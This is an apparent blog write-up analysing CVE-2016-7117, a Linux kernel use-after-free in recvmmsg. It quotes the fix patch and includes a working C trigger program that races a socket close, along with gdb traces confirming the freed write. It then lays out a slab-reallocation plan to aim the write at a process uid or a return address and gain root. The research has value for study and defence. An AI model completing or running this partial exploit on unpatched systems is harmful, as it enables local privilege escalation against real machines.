Notes about CVE-2016-7117
It's hard to find information about this, so I started looking deeper.
The Register has some cursory information:
The first of these (CVE-2016-7117) lies in the kernel networking subsystem allowing remote attackers to execute arbitrary code in the context of the kernel.
("Another critical hole (CVE-2016-0758 ) allows installed apps to execute arbitrary code within the context of the kernel via an elevation of privilege vulnerability in the kernel ASN.1 decoder." sounds fun too…)
The Debian and Ubuntu bug trackers both describe this as "use after
free in the recvmmsg exit path", which is a big hint. The Debian page
lists 4.5.2-1
as the "Fixed Version", which was released in
April. That page's changelog includes "net: Fix use after free in the
recvmmsg exit path". And so I found this email from March from Arnaldo
Carvalho de Melo, with a patch:
diff --git a/net/socket.c b/net/socket.c index c044d1e8508c..db13ae893dce 100644 --- a/net/socket.c +++ b/net/socket.c @@ -2240,31 +2240,31 @@ int __sys_recvmmsg(int fd, struct mmsghdr __user *mmsg, unsigned int vlen, cond_resched(); } -out_put: - fput_light(sock->file, fput_needed); - if (err == 0) - return datagrams; + goto out_put; - if (datagrams != 0) { + if (datagrams == 0) { + datagrams = err; + goto out_put; + } + + /* + * We may return less entries than requested (vlen) if the + * sock is non block and there aren't enough datagrams... + */ + if (err != -EAGAIN) { /* - * We may return less entries than requested (vlen) if the - * sock is non block and there aren't enough datagrams... + * ... or if recvmsg returns an error after we + * received some datagrams, where we record the + * error to return on the next call or if the + * app asks about it using getsockopt(SO_ERROR). */ - if (err != -EAGAIN) { - /* - * ... or if recvmsg returns an error after we - * received some datagrams, where we record the - * error to return on the next call or if the - * app asks about it using getsockopt(SO_ERROR). - */ - sock->sk->sk_err = -err; - } - - return datagrams; + sock->sk->sk_err = -err; } +out_put: + fput_light(sock->file, fput_needed); - return err; + return datagrams; } SYSCALL_DEFINE5(recvmmsg, int, fd, struct mmsghdr __user *, mmsg, -- 2.5.0
This was merged and became 34b88a6 in the kernel repository.
This code is in __sys_recvmmsg
; it looks roughly like this (before
the fix, at b6e4038, with irrelevant bits replaced with /* ... */
):
int __sys_recvmmsg(int fd, struct mmsghdr __user *mmsg, unsigned int vlen, unsigned int flags, struct timespec *timeout) { int fput_needed, err, datagrams; struct socket *sock; struct mmsghdr __user *entry; struct compat_mmsghdr __user *compat_entry; struct msghdr msg_sys; struct timespec end_time; if (timeout && poll_select_set_timeout(&end_time, timeout->tv_sec, timeout->tv_nsec)) return -EINVAL; datagrams = 0; sock = sockfd_lookup_light(fd, &err, &fput_needed); if (!sock) return err; err = sock_error(sock->sk); if (err) goto out_put; entry = mmsg; compat_entry = (struct compat_mmsghdr __user *)mmsg; while (datagrams < vlen) { /* ... */ err = ___sys_recvmsg(sock, (struct user_msghdr __user *)entry, &msg_sys, flags & ~MSG_WAITFORONE, datagrams); if (err < 0) break; err = put_user(err, &entry->msg_len); ++entry; } if (err) break; ++datagrams; /* ... */ } out_put: fput_light(sock->file, fput_needed); if (err == 0) return datagrams; if (datagrams != 0) { /* * We may return less entries than requested (vlen) if the * sock is non block and there aren't enough datagrams... */ if (err != -EAGAIN) { /* * ... or if recvmsg returns an error after we * received some datagrams, where we record the * error to return on the next call or if the * app asks about it using getsockopt(SO_ERROR). */ sock->sk->sk_err = -err; } return datagrams; } return err; }
The old code calls sockfd_lookup_light
, and doesn't always
fput_light
before it returns; the new code always calls
fput_light
. The email includes
And, as Dmitry rightly assessed, that is because we can drop the reference and then touch it when the underlying recvmsg calls return some packets and then hit an error, which will make recvmmsg to set sock->sk->sk_err, oops, fix it.
So, to demonstrate the use after free:
recvmmsg
callssockfd_lookup_light
, which probably increases the refcount.recvmmsg
callsrecvmsg
recvmsg
returns an real packet.datagrams
is incremented from 0.recvmmsg
callsrecvmsg
recvmsg
returns an error other than-EAGAIN
.recvmmsg
breaks to the end of the whilefput_light
is called, which decreases the refcount if it was increased above. Then thestruct socket
may be freed at any point.err != 0
, so we don'treturn datagrams
datagrams != 0
, anderr != -EAGAIN
, so we dosock->sk->sk_err = -err
. Thissock
may have been freed afterfput_light
, so this is a use after free.
Questions:
- How do we make
recvmsg
error for the second packet? - For a use-after-free, we need that to actually have been freed. How do we do that?
- Ultimately we want to get the allocation that takes the place where
sock
was, fill in thesk
pointer, and get the kernel to write to a place we choose. Is that realistic?
I'm going to think about this first from the perspective of a local user, since remote exploitation seems much harder.
Making recvmsg
err
So __sys_recvmmsg
calls ___sys_recvmsg
, which calls
copy_msghdr_from_user(msg_sys, msg, &uaddr, &iov);
and returns an
error if it does:
if (MSG_CMSG_COMPAT & flags) err = get_compat_msghdr(msg_sys, msg_compat, &uaddr, &iov); else err = copy_msghdr_from_user(msg_sys, msg, &uaddr, &iov); if (err < 0) return err;
this looks promising (in copy_msghdr_from_user
):
if (!access_ok(VERIFY_READ, umsg, sizeof(*umsg)) || __get_user(uaddr, &umsg->msg_name) || __get_user(kmsg->msg_namelen, &umsg->msg_namelen) || __get_user(uiov, &umsg->msg_iov) || __get_user(nr_segs, &umsg->msg_iovlen) || __get_user(kmsg->msg_control, &umsg->msg_control) || __get_user(kmsg->msg_controllen, &umsg->msg_controllen) || __get_user(kmsg->msg_flags, &umsg->msg_flags)) return -EFAULT;
and the manpage says
ERRORS These are some standard errors generated by the socket layer. Additional errors may be generated and returned from the underlying protocol modules; see their manual pages.
… EFAULT The receive buffer pointer(s) point outside the process's address space.
So I think we can send two valid messages, and have the second
rcvmmsg
header point to a bad receive buffer.
Closing the socket
This should be as easy as closing the socket in question in a thread
while another thread is in recvmmsg
.
Trying it out
We'll try triggering the panic from userspace.
/* -*- compile-command: "gcc -Wall -Werror -pthread -static try_recvmmsg.c -o try_recvmmsg" -*- */ #define _GNU_SOURCE #include <errno.h> #include <sys/socket.h> #include <sys/types.h> #include <unistd.h> #include <stdio.h> #include <pthread.h> #define msg "hello!" struct thread_config { int fds[2]; char data[1024]; }; void *send_and_close_in_thread (void *arg) { struct thread_config *config = arg; /* send the messages */ for (size_t i = 0; i < 2; i++) { if (send(config->fds[0], msg, sizeof(msg), 0) != sizeof(msg)) { fprintf(stderr, "++ in send: %m\n"); close(config->fds[0]); close(config->fds[1]); return NULL; } } /* wait for it to be received, then close things, so that the kernel doesn't EBADF */ while (config->data[0] != msg[0]);; close(config->fds[0]); close(config->fds[1]); return NULL; } int main (int argc, char **argv) { fprintf(stderr, "++ running!\n"); struct thread_config config = {0}; if (socketpair(AF_LOCAL, SOCK_DGRAM, 0, config.fds)) { fprintf(stderr, "++ in socketpair: %m\n"); return 1; } pthread_t thread = {0}; if (pthread_create(&thread, NULL, send_and_close_in_thread, &config)) { fprintf(stderr, "++ in pthread_create: %m\n"); close(config.fds[0]); close(config.fds[1]); return 1; } /* receive the first message fine. try to receive the second message to a buffer out of our address space, so that ___sys_recvmsg will return EFAULT. */ recvmmsg(config.fds[1], (struct mmsghdr[2]) { { .msg_hdr = { .msg_iov = & (struct iovec) { .iov_base = &config.data, .iov_len = sizeof(config.data) }, .msg_iovlen = 1 } }, { .msg_hdr = { .msg_iov = & (struct iovec) { .iov_base = (void*) (~0), .iov_len = 1024, }, .msg_iovlen = 1 } }, }, 2, 0, & (struct timespec) { .tv_sec = 1 }); fprintf(stderr, "++ no panic? got %s.\n", config.data); return 1; }
The timing is a little tricky: we have a thread send messages, wait
for the first one to be received, and then close the fds. If it closes
before the call to __sys_recvmmsg
, __sys_recvmmsg
will return
EBADF
. If it closes after __sys_recvmmsg
sets the error on the
sk_buff
, we won't get a use-after-free.
Then the main thread tries to recvmmsg
two messages, with a bad
result buffer pointer on the second one. This way the second
___sys_recvmsg
call errors, getting us on the code path we hit
before.
I checked this was the right code path like this (gdb connected
to qemu
):
gdb) b copy_msghdr_from_user Breakpoint 21 at 0xffffffff82668db0: file net/socket.c, line 1823. (gdb) c Continuing. [Switching to Thread 1] Thread 1 hit Breakpoint 21, copy_msghdr_from_user (kmsg=0xffff88006b737df8, umsg=0x7ffc232faa80, save_addr=0xffff88006b737ad0, iov=0xffff88006b737a90) at net/socket.c:1823 1823 { (gdb) finish Run till exit from #0 copy_msghdr_from_user (kmsg=0xffff88006b737df8, umsg=0x7ffc232faa80, save_addr=0xffff88006b737ad0, iov=0xffff88006b737a90) at net/socket.c:1823 0xffffffff82669b89 in ___sys_recvmsg (sock=0xffff88006b737e18, msg=0x1ffff1000d6e6003, msg_sys=0xffff88006b737df8, flags=225341379, nosec=<optimized out>) at net/socket.c:2091 2091 err = copy_msghdr_from_user(msg_sys, msg, &uaddr, &iov); Value returned is $59 = 0 (gdb) c Continuing. Thread 1 hit Breakpoint 21, copy_msghdr_from_user (kmsg=0xffff88006b737df8, umsg=0x7ffc232faac0, save_addr=0xffff88006b737ad0, iov=0xffff88006b737a90) at net/socket.c:1823 1823 { (gdb) finish Run till exit from #0 copy_msghdr_from_user (kmsg=0xffff88006b737df8, umsg=0x7ffc232faac0, save_addr=0xffff88006b737ad0, iov=0xffff88006b737a90) at net/socket.c:1823 0xffffffff82669b89 in ___sys_recvmsg (sock=0xffff88006b737b10, msg=0xffff88006b737b28, msg_sys=0xffff88006b737df8, flags=225341266, nosec=<optimized out>) at net/socket.c:2091 2091 err = copy_msghdr_from_user(msg_sys, msg, &uaddr, &iov); Value returned is $60 = -14 (gdb) b socket.c:2265 Breakpoint 22 at 0xffffffff8266b892: file net/socket.c, line 2265. (gdb) c Continuing. Thread 1 hit Breakpoint 22, __sys_recvmmsg (fd=<optimized out>, mmsg=0x7ffc232faac0, vlen=<optimized out>, flags=0, timeout=0xffff88006b737ee0) at net/socket.c:2265 2265 sock->sk->sk_err = -err; (gdb)
After running it a gdb a lot in a VM built on b6e4038 (the commit
immediately before the fix), I got this (my notes in /* ... */
inline):
(gdb) b __sys_recvmmsg Breakpoint 12 at 0xffffffff8266b440: file net/socket.c, line 2171. (gdb) b socket.c:2265 /* sock->sk->sk_err = -err; */ Breakpoint 15 at 0xffffffff8266b892: file net/socket.c, line 2265. (gdb) c Continuing. Thread 2 hit Breakpoint 12, __sys_recvmmsg (fd=4, mmsg=0x7fff9f3ccc40, vlen=2, flags=0, timeout=0xffff88006c4e7ee0) at net/socket.c:2171 2171 { /* temporary break at sockfd_lookup_light so we can 'finish' in it to see if what it returns, as a cute trick to get around "<optimized out>" */ (gdb) tbreak sockfd_lookup_light Temporary breakpoint 20 at 0xffffffff82665940: file net/socket.c, line 450. (gdb) c Continuing. Thread 2 hit Temporary breakpoint 20, sockfd_lookup_light (fd=4, err=0xffff88006c4e7d38, fput_needed=0xffff88006c4e7cf8) at net/socket.c:450 450 { (gdb) finish Run till exit from #0 sockfd_lookup_light (fd=4, err=0xffff88006c4e7d38, fput_needed=0xffff88006c4e7cf8) at net/socket.c:450 __sys_recvmmsg (fd=4, mmsg=0x7fff9f3ccc40, vlen=<optimized out>, flags=0, timeout=0xffff88006c4e7ee0) at net/socket.c:2187 2187 if (!sock) Value returned is $50 = (struct socket *) 0xffff88006bf61e00 (gdb) c Continuing. Thread 2 hit Breakpoint 15, __sys_recvmmsg (fd=<optimized out>, mmsg=0x7fff9f3ccc80, vlen=<optimized out>, flags=0, timeout=0xffff88006c4e7ee0) at net/socket.c:2265 2265 sock->sk->sk_err = -err; /* !!! */ (gdb) p ((struct socket *)0xffff88006bf621c0)->file.f_count Cannot access memory at address 0x38 /* ->file has been zeroed out, meaning this has been freed and used for something else */ (gdb) p ((struct socket *)0xffff88006bf621c0)->sk $52 = (struct sock *) 0x0 <irq_stack_union> (gdb) p &(((struct socket *)0xffff88006bf621c0)->sk->sk_err) $53 = (int *) 0x1b0 <irq_stack_union+432> (gdb)
So yes, we've got a use-after-free, and the kernel writes -err
to
the address at 0x1b0.
Why does it only work sometimes? I think it's because the actual free
and using it again happens outside of the fput_light
call tree, so
we're racing with another task or two in the kernel. But we can do it
repeatedly until it does work; it doesn't take long.
Reallocation
So we need to put some data where that struct socket
used to be,
such that sk
is a pointer to a piece of data whose offset
sk_err
is where we would like to write.
struct socket
is part of struct socket_alloc
:
struct socket_alloc { struct socket socket; struct inode vfs_inode; };
They're allocated in sock_alloc
/ sock_alloc_inode
using the slab
allocator This means that they're grabbed from "caches", which
are spread across multiple "slabs". Caches are homogenous type-wise,
and e.g. each struct socket_alloc
in a cache is pre-initialized.
Some resources about the slab allocator:
- "Slab Allocation" on Wikipedia
- "Anatomy of the Linux Slab Allocator" on IBM developerworks (apparently no longer available, so this is a link to an archive).
I can think of a situation where we can use the slab allocator to get what we want to happen:
- The slabs that are part of the
struct socket_alloc
cache (sock_inode_cache
) fill up. - We create a socketpair for our use-after-free that occupies the first and second slot in a new slab.
- We close both elements of our socketpair. This causes the slab to be
freed. We then immediately add some items (more than a slabfull) to
another cache, with the pointer we want to write to at offset
sk
in each item. - This causes a new slab to be allocated for the second cache, which
ideally will be exactly where our first cache used to be. So, the
struct socket
pointer in__sys_recvmmsg
now points to an item we control in a new slab. - The kernel code runs and sets the offset
sk_err
from our pointer to-err
.
Some things that make it easier:
- We can just repeatedly try it until it works, allocating an extra socket each time so that we progress through the slab.
/proc/slabinfo
says that thesock_inode_cache
slab has 12 objects per slab (in my vm; it seems to vary). This is an upper bound on the number of sockets we'll need to open to get an object at the beginning of the slab, assuming no other process is creating sockets.
That sounds totally possible!
What are we getting the kernel to write to? err is -14 in our case, so
the kernel is writing 14 for us. If we control the pointer, though, we
can line it up only partially with a field we want to overwrite,
writing any portion of {0x0e, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
0x00}
anywhere we choose. Some ideas:
- Overwrite the uid of our process (and write
0xe
to the byte before it), so that it has uid 0. - Overwrite a return address on the stack so that the kernel returns to code we choose. (This will be tricky with KASLR).
- Overwrite a boolean on the stack to either 0 or 0xe (truthy) to get around some permission check.
However, I'm not actually sure how aggressively slabs get reused by different caches, and I'm not sure of an easy way to find out. But! We can probably use a lot of memory to make that happen, or try freeing a couple dozen slabs at the same time.
Which cache do we try to write to?
/proc/slabinfo
says the sock_inode_cache
has objects of
size 640. This is kind of an inconvenient number, the only other
objects with that size are also inode caches, and they don't have any
user-controllable data at the offset of sk_err
.
But the kmalloc cache kmalloc-1024
has 1024-size items in the
caches, and 16 of them fit in the cache. If we can find a path in the
kernel that copies data we control into a kmalloc bigger than 460 +
sk_err
+ sizeof(void *)
= 896, we can get the kernel to set an int
at an address we choose to 14
.
But there are a lot of calls to kmalloc
in the kernel, and finding a
good one will take time. So I'm publishing this now; I'll write
more when I find one.
How much trouble are we in?
I think this exploit will work, so we have a pretty bad local privilege escalation bug. I was able to trigger the use-after-free in less than an hour of work after reading the description of the bug, and I'm not even a kernel hacker. Given more time I'm pretty sure I could make it repeatably write to a location of our choice.
I think this would be difficult to exploit remotely, for the following reasons:
recvmmsg
is much less common thanrecvmsg
, in the wild. GitHub search shows about 800k uses ofrecvmmsg
vs about 3.6 million forrecvmsg
.recvmsg
isn't all that common anyway;recv
has about 29 million uses on GitHub.- A remote attacker would need to cause the
recvmsg
to err and cause the socket to close while in therecvmmsg
call. Looking casually, I didn't see a great way to causerecvmmsg
to err from the sending side.recvmsg
andrecvmmsg
are normally used for connectionless protocols, anyway, so I wouldn't expect it to be easy to cause a service to close its socket.
But I'd love to be proven wrong.